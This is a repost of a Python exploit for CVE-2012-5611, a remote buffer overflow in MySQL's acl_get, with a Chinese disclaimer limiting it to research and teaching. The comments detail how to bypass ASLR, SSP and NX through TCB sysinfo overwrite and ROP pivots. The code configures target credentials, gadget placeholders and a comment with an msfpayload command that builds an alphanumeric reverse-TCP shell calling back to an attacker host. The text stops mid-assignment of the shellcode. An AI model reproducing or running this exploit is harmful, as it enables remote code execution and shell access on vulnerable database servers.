测试方法:
程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
1 !/usr/bin/env python 2 # 27/12/12 - status : public release 3 4 # CVE-2012-5611 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611 ) 5 # -------- Author : ipv 6 # -------- Impact : high 7 # -------- URL : http://blog.ring0.me/ 8 # -------- Description 9 # 10 # The code below is linked to CVE-2012-5611, a flaw discovered by kingcope. 11 # MySQL server is prone to a remote buffer overflow that 12 # allow remote authenticated attacker to reach code execution in the 13 # context of the user running MySQL instance (default: mysql user). 14 15 # The vulnerability resides in acl_get function, called when authenticated 16 # user requests a privileged Account Managment statement. MySQL fails 17 # to verify user controlled data len of "db" parameter. 18 # 19 # end=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db); 20 # 21 # The destination address of strcpy is located on a mmaped page dedicated to 22 # user connection which allow a buffer overflow on adjacent memory. 23 # 24 # Differents attacks vector may be possiblea according the system. 25 # FYI Microsoft Windows versions are as well vulnerables. 26 #--------------------------------------------------------- 27 # To bypass ASLR/SSP/RELRO/NX: 28 #------------------------------------------------------------------------------ 29 # I take profit of Threading-Model. This means MySQL use only one address 30 # space for all MySQL ressources (data structures, network managment, 31 # session, etc.). 32 # To bypass SSP, i overwrite sysinfo handler(pointing to sysenter vdso) of 33 # TCB structure located more higher on the stack. 34 # ROP chains aims to pivot to our controlled stack data. At this point, 35 # if we overwrite sysinfo handler, we cannot use ret2libc and/or GOT 36 # deferencing technique since libc API relies on the sysinfo pointer 37 # to call sysenter. 38 # 39 # So to accomplish code exec, afaik, you have two way : 40 # 1 - Extract sysinfo of an intact TCB and use it as proxy call 41 # (or you can restore the first sysinfo after doing modification on got) 42 # -> i use it for redhat exploit (no SSP on redhat/centos); 43 # -> this allow us to bypass relro/alsr/nx 44 # relro. 45 # 2 - Find a int0x80 / sysenter gadget in .text ; 46 # (Bad instruction follow int0x80 gadget, you have a one shooter to get 47 # code exec). So, i advise you to find a sysenter) 48 # - i use sysenter for ubuntu 10.04 self-compiled with SSP. 49 # - this allow us bypass relro/ssp/alsr/nx 50 # 51 # Shellcodes are alphanum-mixed (skylined tool ftw). Exploit bypass 52 # SSP/ASLR/NX. 53 # 54 #--------------------------------------------------------- 55 # UTF-8 and ROP chains limitation : 56 #--------------------------------------------------------- 57 # Mysql Schema Object Name restricts database name to be alpha numeric 58 # (and $ _). 59 # To bypass it, i use utf-8 encoding with byte lower than 0x80. Encoding is 60 # done via MySQL when databasename is quoted with `` (mandatory to 61 # successful exploit target). Yes the devil is in the details. 62 63 # MySQL reference : https://dev.mysql.com/doc/refman/5.1/en/identifiers.html 64 # 65 # For any comments/job offer, mail me : ipv _at_ consortium-of-pwners . net 66 67 ######################################################################## 68 # Modules 69 # 70 71 import pymysql 72 import sys 73 import struct 74 import os, socket 75 76 ######################################################################## 77 # Authentication options 78 # 79 80 MYSQL_USER = "test" 81 MYSQL_PASSWORD = "" 82 83 #MYSQL_HOST = "192.168.130.147" 84 MYSQL_HOST = "192.168.130.129" 85 MYSQL_PORT = 3306 86 87 ######################################################################## 88 # Helper 89 # 90 91 def _x(v): 92 if isinstance(v, str): 93 return v 94 return struct.pack("<I", v) 95 96 # TCP is used when we face to SSP 97 class _TCB: 98 tcb = 0 # updated later by a ret gadget 99 dtv = "BBBB" 100 _self = "CCCC" 101 multiple_threads= "DDDD" 102 sysinfo = 0 # SEIP - updated later by stack pivot gadget 103 stack_guard = "AAAA" 104 pointer_guard = 0 # updated later by a pop pop ret gadget 105 106 # base class 107 class rc_base: 108 eip_off = 0 109 align_payload = 0 110 align_stack = 2048 111 retsled = "" 112 safe_overwrite = "" 113 pivot = "" 114 pppr = "" 115 ppr = "" 116 117 # ./msf/msfpayload linux/x86/shell_reverse_tcp2 LHOST=192.168.130.1 LPORT=4444 R | ./alpha2 esp 118 # XXX - CHANGEME ! 119 sc_rev_tcp =